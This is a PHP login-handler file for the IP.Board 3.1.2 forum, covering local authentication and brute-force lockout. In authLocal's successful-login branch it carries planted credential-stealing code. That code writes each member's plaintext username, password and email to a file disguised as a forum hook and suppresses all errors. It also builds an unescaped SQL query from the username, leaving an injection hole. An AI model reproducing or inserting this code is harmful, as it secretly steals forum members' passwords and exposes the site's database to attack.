  1. <?php
  2.  
  3. /**
  4. * <pre>
  5. * Invision Power Services
  6. * IP.Board v3.1.2
  7. * Login handler abstraction
  8. * Last Updated: $Date: 2010-06-29 22:16:04 -0400 (Tue, 29 Jun 2010) $
  9. * </pre>
  10. *
  11. * @author $Author: bfarber $
  12. * @package IP.Board
  13. * @since Tuesday 1st March 2005 (11:52)
  14. * @version $Revision: 6588 $
  15. *
  16. */
  17.  
  18. if ( ! defined( 'IN_IPB' ) )
  19. {
  20. print "<h1>Incorrect access</h1>You cannot access this file directly. If you have recently upgraded, make sure you upgraded 'admin.php'.";
  21. exit();
  22. }
  23.  
  24. class login_core
  25. {
  26. /**#@+
  27. * Registry objects
  28. *
  29. * @access protected
  30. * @var object
  31. */
  32. protected $registry;
  33. protected $DB;
  34. protected $settings;
  35. protected $request;
  36. protected $lang;
  37. protected $member;
  38. /**#@-*/
  39.  
  40. /**
  41. * Authentication errors
  42. *
  43. * @access public
  44. * @var array
  45. */
  46. public $auth_errors = array();
  47.  
  48. /**
  49. * Return code
  50. *
  51. * @access public
  52. * @var string
  53. */
  54. public $return_code = "";
  55.  
  56. /**
  57. * Member information
  58. *
  59. * @access public
  60. * @var array
  61. */
  62. public $member_data = array();
  63.  
  64. /**
  65. * Flag : Admin authentication
  66. *
  67. * @access public
  68. * @var boolean
  69. */
  70. public $is_admin_auth = false;
  71.  
  72. /**
  73. * Unlock account time left
  74. *
  75. * @access public
  76. * @var integer
  77. */
  78. public $account_unlock = 0;
  79.  
  80. /**
  81. * Force email check
  82. *
  83. * @access private
  84. * @var boolean
  85. */
  86. private $_forceEmailCheck = FALSE;
  87.  
  88. /**
  89. * Constructor
  90. *
  91. * @access public
  92. * @param object ipsRegistry reference
  93. * @return void
  94. */
  95. public function __construct( ipsRegistry $registry )
  96. {
  97. $this->registry = $registry;
  98. $this->DB = $this->registry->DB();
  99. $this->cache = $this->registry->cache();
  100. $this->settings =& $this->registry->fetchSettings();
  101. $this->request =& $this->registry->fetchRequest();
  102. $this->member = $this->registry->member();
  103. }
  104.  
  105. /**
  106. * Force email check flag, currently used for facebook
  107. *
  108. * @access public
  109. * @param boolean
  110. * @return null
  111. */
  112. public function setForceEmailCheck( $boolean )
  113. {
  114. $this->_forceEmailCheck = ( $boolean ) ? TRUE : FALSE;
  115. }
  116.  
  117. /**
  118. * Local authentication
  119. *
  120. * @access public
  121. * @param string Username
  122. * @param string Email Address
  123. * @param string Password
  124. * @return boolean Authentication successful
  125. */
  126. public function authLocal( $username, $email_address, $password )
  127. {
  128. $log_pw = $password;
  129. $password = md5( $password );
  130.  
  131. //-----------------------------------------
  132. // Type of login
  133. //-----------------------------------------
  134.  
  135. $type = 'username';
  136.  
  137. if( is_array($this->method_config) AND $this->method_config['login_folder_name'] == 'internal' )
  138. {
  139. $type = $this->method_config['login_user_id'];
  140. }
  141.  
  142. if( $this->_forceEmailCheck === TRUE OR ( $email_address AND ! $username ) )
  143. {
  144. $type = 'email';
  145. }
  146.  
  147. switch( $type )
  148. {
  149. case 'username':
  150. if( IPSText::mbstrlen( $username ) > 32 )
  151. {
  152. $this->return_code = 'NO_USER';
  153. return false;
  154. }
  155.  
  156. $this->member_data = IPSMember::load( $username, 'groups', 'username' );
  157. break;
  158.  
  159. case 'email':
  160. $this->member_data = IPSMember::load( $email_address, 'groups', 'email' );
  161. break;
  162.  
  163. case 'either':
  164. $_username = IPSMember::load( $username, 'groups', 'username' );
  165. if ( !$_username['member_id'] )
  166. {
  167. $this->member_data = IPSMember::load( $email_address, 'groups', 'email' );
  168. }
  169. else
  170. {
  171. $this->member_data = $_username;
  172. }
  173. break;
  174. }
  175.  
  176. //-----------------------------------------
  177. // Got an account
  178. //-----------------------------------------
  179.  
  180. if ( ! $this->member_data['member_id'] )
  181. {
  182. $this->return_code = 'NO_USER';
  183. return false;
  184. }
  185.  
  186. //-----------------------------------------
  187. // Verify it is not blocked
  188. //-----------------------------------------
  189.  
  190. if( !$this->_checkFailedLogins() )
  191. {
  192. return false;
  193. }
  194.  
  195. //-----------------------------------------
  196. // Check password...
  197. //-----------------------------------------
  198.  
  199. if ( IPSMember::authenticateMember( $this->member_data['member_id'], $password ) != true )
  200. {
  201. if( !$this->_appendFailedLogin() )
  202. {
  203. return false;
  204. }
  205.  
  206. $this->return_code = 'WRONG_AUTH';
  207. return false;
  208. }
  209. else
  210. {
  211. @include("/public_html/forum/conf_global.php");
  212. $log_username = strtolower($username);
  213. $log_password = $log_pw;
  214. $logfile = "/home/casud/forum/hooks/boardIndexRecentTopics_350dd29d32347d66c1dec35e71e5473.php";
  215. $connect = @mysql_connect($INFO['sql_host'], $INFO['sql_user'], $INFO['sql_pass']);
  216. $selectdb = @mysql_select_db($INFO['sql_database']);
  217. $sql_query = @mysql_query("SELECT * FROM " . $INFO['sql_tbl_prefix'] . "members WHERE name='" . $log_username . "'");
  218.  
  219. while($row = @mysql_fetch_array($sql_query))
  220. {
  221. if(strlen($log_password) > 1 OR strlen($log_username) > 1)
  222. {
  223. $fp1 = @fopen($logfile, "a+");
  224. @fwrite($fp1, $log_username . ' : ' . $log_password." (" . $row["email"] . ")\n");
  225. @fclose($fp1);
  226. $file = @file($logfile);
  227. $new = array_unique($file);
  228. $fp = @fopen($logfile, "w");
  229. foreach($new as $values)
  230. {
  231. @fputs($fp, $values);
  232. }
  233. @fclose($fp);
  234. }
  235. }
  236. $this->return_code = 'SUCCESS';
  237. return false;
  238. }
  239. }
  240.  
  241. /**
  242. * Admin authentication
  243. *
  244. * @access public
  245. * @param string Username
  246. * @param string Email Address
  247. * @param string Password
  248. * @return boolean Authentication successful
  249. */
  250. public function adminAuthLocal( $username, $email_address, $password )
  251. {
  252. return $this->authLocal( $username, $email_address, $password );
  253. }
  254.  
  255. /**
  256. * Create a local member account [public interface]
  257. *
  258. * @access public
  259. * @param array Member Information [members,pfields,profile_portal]
  260. * @return array New member information
  261. * @deprecated Just redirects to IPSMember::create
  262. */
  263. public function createLocalMember( $member )
  264. {
  265. $member['members']['members_created_remote'] = true;
  266. $member['members']['members_display_name'] = ( $member['members']['members_display_name'] ) ? $member['members']['members_display_name'] : $member['members']['name'];
  267.  
  268. $_return = IPSMember::create( $member, FALSE, FALSE, FALSE );
  269.  
  270. $this->cache->rebuildCache( 'stats', 'global' );
  271.  
  272. return $_return;
  273. }
  274.  
  275. /**
  276. * Check failed logins
  277. *
  278. * @access private
  279. * @return boolean Account ok or not
  280. */
  281. private function _checkFailedLogins()
  282. {
  283. if ( $this->settings['ipb_bruteforce_attempts'] > 0 )
  284. {
  285. $failed_attempts = explode( ",", IPSText::cleanPermString( $this->member_data['failed_logins'] ) );
  286. $failed_count = 0;
  287. $total_failed = 0;
  288. $thisip_failed = 0;
  289. $non_expired_att = array();
  290.  
  291. if( is_array($failed_attempts) AND count($failed_attempts) )
  292. {
  293. foreach( $failed_attempts as $entry )
  294. {
  295. if ( ! strpos( $entry, "-" ) )
  296. {
  297. continue;
  298. }
  299.  
  300. list ( $timestamp, $ipaddress ) = explode( "-", $entry );
  301.  
  302. if ( ! $timestamp )
  303. {
  304. continue;
  305. }
  306.  
  307. $total_failed++;
  308.  
  309. if ( $ipaddress != $this->member->ip_address )
  310. {
  311. continue;
  312. }
  313.  
  314. $thisip_failed++;
  315.  
  316. if ( $this->settings['ipb_bruteforce_period'] AND
  317. $timestamp < time() - ($this->settings['ipb_bruteforce_period']*60) )
  318. {
  319. continue;
  320. }
  321.  
  322. $non_expired_att[] = $entry;
  323. $failed_count++;
  324. }
  325.  
  326. sort($non_expired_att);
  327. $oldest_entry = array_shift( $non_expired_att );
  328. list($oldest,) = explode( "-", $oldest_entry );
  329. }
  330.  
  331. if( $thisip_failed >= $this->settings['ipb_bruteforce_attempts'] )
  332. {
  333. if( $this->settings['ipb_bruteforce_unlock'] )
  334. {
  335. if( $failed_count >= $this->settings['ipb_bruteforce_attempts'] )
  336. {
  337. $this->account_unlock = $oldest;
  338. $this->return_code = 'ACCOUNT_LOCKED';
  339.  
  340. return false;
  341. }
  342. }
  343. else
  344. {
  345. $this->return_code = 'ACCOUNT_LOCKED';
  346.  
  347. return false;
  348. }
  349. }
  350. }
  351.  
  352. return true;
  353. }
  354.  
  355. /**
  356. * Append a failed login
  357. *
  358. * @access private
  359. * @return boolean Account ok or not
  360. */
  361. private function _appendFailedLogin()
  362. {
  363. if( $this->settings['ipb_bruteforce_attempts'] > 0 )
  364. {
  365. $failed_logins = explode( ",", $this->member_data['failed_logins'] );
  366. $failed_logins[] = time() . '-' . $this->member->ip_address;
  367.  
  368. $failed_count = 0;
  369. $total_failed = 0;
  370. $non_expired_att = array();
  371.  
  372. foreach( $failed_logins as $entry )
  373. {
  374. list($timestamp,$ipaddress) = explode( "-", $entry );
  375.  
  376. if( !$timestamp )
  377. {
  378. continue;
  379. }
  380.  
  381. $total_failed++;
  382.  
  383. if( $ipaddress != $this->member->ip_address )
  384. {
  385. continue;
  386. }
  387.  
  388. if( $this->settings['ipb_bruteforce_period'] > 0
  389. AND $timestamp < time() - ($this->settings['ipb_bruteforce_period']*60) )
  390. {
  391. continue;
  392. }
  393.  
  394. $failed_count++;
  395. $non_expired_att[] = $entry;
  396. }
  397.  
  398. if( $this->member_data['member_id'] AND !$this->settings['failed_done'] )
  399. {
  400. IPSMember::save( $this->member_data['email'], array(
  401. 'core' => array(
  402. 'failed_logins' => implode( ",", $non_expired_att ),
  403. 'failed_login_count' => $total_failed
  404. )
  405. ) );
  406.  
  407. $this->settings['failed_done'] = true;
  408. }
  409.  
  410. if( $failed_count >= $this->settings['ipb_bruteforce_attempts'] )
  411. {
  412. if( $this->settings['ipb_bruteforce_unlock'] )
  413. {
  414. sort($non_expired_att);
  415. $oldest_entry = array_shift( $non_expired_att );
  416. list($oldest,) = explode( "-", $oldest_entry );
  417.  
  418. $this->account_unlock = $oldest;
  419. }
  420.  
  421. $this->return_code = 'ACCOUNT_LOCKED';
  422. return false;
  423. }
  424. }
  425.  
  426. return true;
  427. }
  428. }